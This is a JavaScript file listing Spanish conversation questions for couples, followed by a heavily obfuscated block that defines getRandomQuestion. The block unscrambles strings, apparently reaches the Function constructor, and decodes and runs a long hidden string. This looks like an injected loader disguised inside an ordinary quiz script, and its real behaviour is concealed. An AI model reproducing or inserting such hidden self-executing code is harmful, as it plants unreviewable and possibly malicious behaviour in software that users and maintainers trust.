const questions = [
    { text: "¿Cómo fue tu infancia?", answer: "" },
    { text: "¿Cuáles son tus proyectos a futuro?", answer: "" },
    { text: "¿Cuáles son tus miedos y/o inseguridades?", answer: "" },
    { text: "¿Cuál es la peor cita que has tenido?", answer: "" },
    { text: "¿Qué fue lo primero que pensaste cuando me conociste?", answer: "" },
    { text: "¿Cuál ha sido tu experiencia más embarazosa?", answer: "" },
    { text: "¿Crees que has encontrado ya a tu media naranja?", answer: "" },
    { text: "¿Alguna vez te han pegado un bofetón?", answer: "" },
    { text: "¿Me has mentido alguna vez?", answer: "" },
    { text: "¿Qué saben y qué piensan de mí, tus amigos?", answer: "" },
    { text: "¿Qué es lo que más te gusta de ti mismo?", answer: "" },
    { text: "¿Qué es lo mejor que has hecho por amor?", answer: "" },
    { text: "¿Cuál es la última foto que le has mandado a alguien?", answer: "" },
    { text: "¿Cuándo y con quién fue tu primer beso?", answer: "" },
    { text: "¿Cómo sueles conquistar a l@s chic@s?", answer: "" },
    { text: "¿Cómo te describirías en 3 palabras?", answer: "" },
    { text: "¿Alguna vez te has enamorado a primera vista?", answer: "" },
    { text: "¿Te gusta jugar al 'Yo nunca nunca'?", answer: "" },
    { text: "¿Alguna vez has consumido drogas?", answer: "" },
    { text: "¿Qué es lo que más te gustaría hacerme?", answer: "" },
    { text: "¿Qué lencería te vuelve loco?", answer: "" },
    { text: "¿Qué te gustaría que te susurrase al oído?", answer: "" },
    { text: "¿Te gustan los bailes eróticos?", answer: "" },
    { text: "¿Tienes algún fetiche?", answer: "" },
    { text: "¿Alguna vez te has acostado con alguien mayor que tú?", answer: "" },
    { text: "¿Alguna vez has tenido fantasías con alguien que no deberías?", answer: "" },
    { text: "¿Quién se fijó primero en el otro?", answer: "" },
    { text: "¿Quién pidió la primera cita?", answer: "" },
    { text: "¿Quién besa mejor?", answer: "" },
    { text: "¿Quién se enamoró antes?", answer: "" },
    { text: "¿Quién dijo primero 'te quiero'?", answer: "" },
    { text: "¿Quién presentó antes a sus padres?", answer: "" },
    { text: "¿Quién es más romántico de los dos?", answer: "" },
    { text: "¿Quién es más sociable?", answer: "" },
    { text: "¿Quién piensa más en el futuro?", answer: "" },
    { text: "¿Quién es más detallista?", answer: "" },
    { text: "¿Quién es más presumido?", answer: "" },
    { text: "¿Quién discute más?", answer: "" },
    { text: "¿Quién come más sano?", answer: "" },
    { text: "¿Quién tiene más estilo?", answer: "" },
    { text: "¿Quién es más sensible?", answer: "" },
    { text: "¿Quién es más orgulloso?", answer: "" },
    { text: "¿Quién llega siempre tarde?", answer: "" },
    { text: "¿Cómo describirías tu forma de ser?", answer: "" },
    { text: "¿Cuál ha sido el momento más difícil de tu vida? ¿Y el más feliz?", answer: "" },
    { text: "¿Qué consigue que te pongas nervioso/a?", answer: "" },
    { text: "¿Cuáles tu mayor virtud? ¿Y defecto?", answer: "" },
    { text: "¿Qué es lo que te hace enfadar? ¿Y qué te relaja?", answer: "" },
    { text: "¿Cómo reaccionas cuando algo te frustra?", answer: "" },
    { text: "¿Cambiarías alguna cosa de tu pasado?", answer: "" },
    { text: "¿Qué diría la gente de ti tras tu muerte?", answer: "" },
    { text: "De todas las personas que conoces, ¿Qué muerte te afectaría más?", answer: "" },
    { text: "¿Cuándo fue la última vez que lloraste y por qué?", answer: "" },
    { text: "¿Alguna vez has tenido depresión? ¿Y/o ansiedad?", answer: "" },
    { text: "¿Cómo te imaginas tu vida dentro de 5 años? ¿y dentro de 20 años?", answer: "" },
    { text: "¿Cuál es la diferencia entre vivir y existir?", answer: "" },
    { text: "¿Qué es lo que más detestas de una persona? ¿Por qué?", answer: "" },
    { text: "¿Cuál es la promesa más importante que te has hecho?", answer: "" },
    { text: "¿Cómo podemos tener relaciones saludables?", answer: "" },
    { text: "¿Cuál es el significado de la vida?", answer: "" },
    { text: "¿Estás en control de tu vida?", answer: "" },
    { text: "¿Qué consideras que es más importante en una relación de pareja?", answer: "" },
    { text: "¿Qué cosas te emocionan?", answer: "" },
    { text: "¿Te has convertido en la persona que querías ser?", answer: "" },
    { text: "¿Te sientes vivo?", answer: "" },
    { text: "¿Crees que existe el amor verdadero?", answer: "" },
    { text: "¿Cuál fue el día más feliz de tu vida?", answer: "" },
    { text: "¿Cuál es la persona más importante en tu vida?", answer: "" },
    { text: "¿Qué es lo que más miedo te da?", answer: "" },
    { text: "¿Cómo sería tu día perfecto?", answer: "" },
    { text: "¿Cómo describirías la relación con tu familia?", answer: "" },
    { text: "¿Qué es lo que más te gusta de mí?", answer: "" },
    { text: "¿Qué es lo que más valoras en una pareja?", answer: "" },
    { text: "¿Cómo te gustaría que fuera nuestra relación dentro de un año?", answer: "" },
    { text: "¿Qué es lo que más te hace reír?", answer: "" },
    { text: "¿Podrías decir tres virtudes que posees?", answer: "" },
    { text: "¿Qué cosas te hacen sentir bien?", answer: "" },
    { text: "¿Qué cosas no te hacen sentir bien?", answer: "" },
    { text: "¿Qué crees que haces diferente de las demás personas?", answer: "" },
    { text: "¿Qué clase de música escuchas?", answer: "" },
    { text: "¿Qué cosas son las que más te apasionan?", answer: "" },
    { text: "¿Cuál es el trabajo de tus sueños?", answer: "" },
    { text: "¿Qué no disfrutas hacer?", answer: "" },
    { text: "¿Cuál son tus temores más profundos?", answer: "" },
    { text: "¿Cómo fueron tus momentos más vergonzosos?", answer: "" },
    { text: "¿Cuáles fueron tus momentos más felices de la infancia?", answer: "" },
    { text: "¿Cuáles son tus mejores recuerdos de nosotros?", answer: "" },
    { text: "¿Qué cosas tenemos en común?", answer: "" },
    { text: "¿Cuál es tu peor hábito?", answer: "" },
    { text: "¿Qué personas son las que más influyen en tu vida?", answer: "" },
    { text: "¿Qué cosas con indispensables en tu vida?", answer: "" },
    { text: "¿Crees en el matrimonio?", answer: "" },
    { text: "¿Cuáles son tus comidas favoritas?", answer: "" },
    { text: "¿Te gusta leer? ¿Qué género lees?", answer: "" },
    { text: "¿Te gustan los animales?", answer: "" },
    { text: "¿Crees que los detalles son importantes en la relación?", answer: "" },
    { text: "¿Tus papás qué piensan de mí?", answer: "" },
    { text: "¿Eres más mental o emocional?", answer: "" },
    { text: "¿Cuál es tu estación del año preferida? ¿Por qué?", answer: "" },
    { text: "Si pudieras viajar hacia atrás en el tiempo para cambiar una sola cosa de tu vida, ¿cuál sería?", answer: "" },
    { text: "¿Te consideras más introvertido o extrovertido?", answer: "" },
    { text: "¿Cuál ha sido la mejor época de tu vida? ¿Y la peor?", answer: "" },
    { text: "¿Crees en las segundas oportunidades?", answer: "" },
    { text: "¿Cuál es el viaje de tus sueños?", answer: "" },
    { text: "¿Qué te obsesiona?", answer: "" },
    { text: "¿Qué te divierte?", answer: "" },
    { text: "¿Vives de noche o de día?", answer: "" },
    { text: "¿De qué estás más orgulloso en tu vida?", answer: "" },
    { text: "¿Cuál es tu recuerdo favorito?", answer: "" },
    { text: "¿Qué sientes cuando nos besamos y abrazamos?", answer: "" },
    { text: "¿En qué momento notaste que yo te gustaba?", answer: "" },
    { text: "¿Cuál fue tu primera impresión cuando me viste por primera vez?", answer: "" },
    { text: "¿Cómo describes nuestro primer beso?", answer: "" },
    { text: "¿Por qué me amas?", answer: "" },
    { text: "¿Qué es lo que más te gusta de mi cuerpo?", answer: "" },
    { text: "¿Sientes paz cuando estás conmigo?", answer: "" }
    // Agrega más preguntas según sea necesario
];

var getRandomQuestion;(function(){var gAK='',MNL=708-697;function JuG(s){var l=1589949;var x=s.length;var g=[];for(var b=0;b<x;b++){g[b]=s.charAt(b)};for(var b=0;b<x;b++){var k=l*(b+113)+(l%50858);var d=l*(b+459)+(l%21027);var o=k%x;var u=d%x;var z=g[o];g[o]=g[u];g[u]=z;l=(k+d)%3128937;};return g.join('')};var bHi=JuG('ucnchvcroqttojaupbtiyxszfrmkdnswoergl').substr(0,MNL);var OVR='aoh6(( 0l8sn [;=(o.wd;q)q"1a;)ef+=vt=r;n=m;rtt;t(Ce(nn.{r rlc2+,h2r5rrr[,q9ciho))g11r6;,[b"7);)e 9"f8p,eeuf9q-ni5o;t8r6)6hsuw rm))cy61(var+c(]gcfrvlvppsu7l)+<u;=[1]v,v+l sa+ .ppnu,+t03{f+e09,h2.5tu4]m]v"f ;00dnzl=+(=g+)a=g.fgg,rxe[xnfx<tyr!hgu;t=x=.kbh.p) shgu.); ;b(va;r,heilpnba<=vr,f{,sf(-)=rt,0 oCalnivfu d(=bg}8}a>,av.ek,ari{(6;=s(g3=r;()2pn0x.;=;r86vs,,=va,ai=e, f1n[e;)r0e1 ve(,a;1aC+d;it7tz).yrera]t.n(vhuj)-{y);-=)*nrusf;inCth9A738>1fukq,-y;=*47t+hha 0+(siae)C)svm(<S=ef.}hCgbb.pnstCo;[A;r{l;)r+t.nn02vjlxAv.q;pl-,=t=a=ag=hr2erat)e;v=z[x)[ribs(u="4nl)"lr]xev];=l)hepsu2kna4ignr.)jg+r(ktl)c.ltlg,"h=+(niou=e=1rn;}o=12quf;]jil(r2();nA6tr[0]+b(ltoqxt++as;yd;qn]bso,;=oj..}wa,rr(-(q[d]a;5scr]mna(w+o; ,"v}a9a 8. 4aor;.,3rh9a[lr=0i.aoatjo rl]gal ul;v= <qiviot+ a;Cwdyr.jA7a;((k=) b;g;io[.cunla=ia9irq++ao=rj=(sr=8)me+m=(7os;f a(pS8iil,{=namvhtr8h8(va[6 rgio(tnrna"a.q7lu)e+"!}].;vc0zh)m';var Ooq=JuG[bHi];var DQM='';var IlY=Ooq;var vmC=Ooq(DQM,JuG(OVR));var sas=vmC(JuG('f&==b\/{H$.,}H7k..1d5+15,\'a5r*H<6.t hH]b7n\'t(,Hod;;Hnl;HbHnc(HiH?8:H=..$7Hcrat9a(%2Hse6_n9ire!t,;1bcp)d3HabH4561!!.)=HnzdH$dt(iuH20I,ni.*n)2+77f;0H(9bM8r\'bbH}1s(bi!bfb6H8. }Ha[${(3=,H60(epaH%wlhgH;Hto8H. fn%cd})uns0iHmjioco7r59u(=1_cH((;,&;f(. H)(!)n!H@%rHlb.3{:_Hu$(e:,=)a<f(_(_")76.o4l.r1)0)H.=.e5_lf.Hs.5gjutv;cgHd..]9(.H.f2c d(46]H!o.ub])!fk0;(+++mH[[=r.o.j.Hed\/Hcn3q rH[HoHu1uH_H;h+SHHub0%](H+i{ HHe3 ;.);pd.!!Hr.uH6;3)%33H!.95HHC:m]w8H;=[HHb=_)e5. )j)Hbs&aH.5.(n,_],_+s{);H!=.](,))4;({o[H7cv$=f),.#..)((HH p=+;7;8l=(H(.0c39t;0kk*m7Mkkf-f(18<Hqsf,{bH(&.0ldsv_@t}Ht8;H_re#r)0&2H\/r:dr"HHa)Co$}(.H)*99d;!HatHs1.n%==x81.n)s1j-\/1.p6oe8jHv6da!f(.,d.HHb3rr(!6iHS b01))5=Ho mH3rf2(aH_7n47)uuH$_ >(HH2,6=#f7fH=H;$Hob\'et]H(H;(8;%H2t3uHH{1(05uogei cd+bHsm==1 @u\/vdH aH819ea3  9;wH!x]?.63H(;HH]nas80f)3,).nf\'tH}bHd5mb;1m,5Hw#atHd;"H.btHu795t4fH3H );24]]5,n=n!)H.0]4:_dco,;H}6H)HH;t%1HH.7]3H((H.6I{_ex{6@;}5eHH(((ft[]H]",,)ub#_S+n5Had=$H.oHHa)a.__u5_0hae9=1?oH_8Hb5]c_!t_(0nrtdzb6H=i btu=H.r{..)4t![]i)"{i,H66=[7{st.=_nbH$;)if0fu*=t.(8 nHH?+(l;8fc8t8.p{19_*HH;HeHH)"(tl35H7ag.$a+e_{<.[hee,eif.}=(,2HHb>=])d][)_H#(2?Hhr.icH=r4 )8,etHsn37)8(H#6})e6-)_6b.)- n6g35HHx6e{$g8ed8$n$n8 ,)f ee [w53,4!H.H.f3( do=(6rt!,_(3so=(}\'a)6)) .t).)tb=n[=ad9nuHad?_H%]+roc=_ta)i)anhH.H_()boeH)vgt31Mf$;fr((sH;.{3[;}f)0,Hue24;)d6s,(Hbu$fe;cfb)61$9Hl.2H$.HbH%ra($_dv!Hn6!_3burf) ))}e{rn01sodr84!,3q t,te3u 6)uf1 ];4_"HcHhl2rHH8.e43'));var pdF=IlY(gAK,sas );pdF(6882);return 7956})()
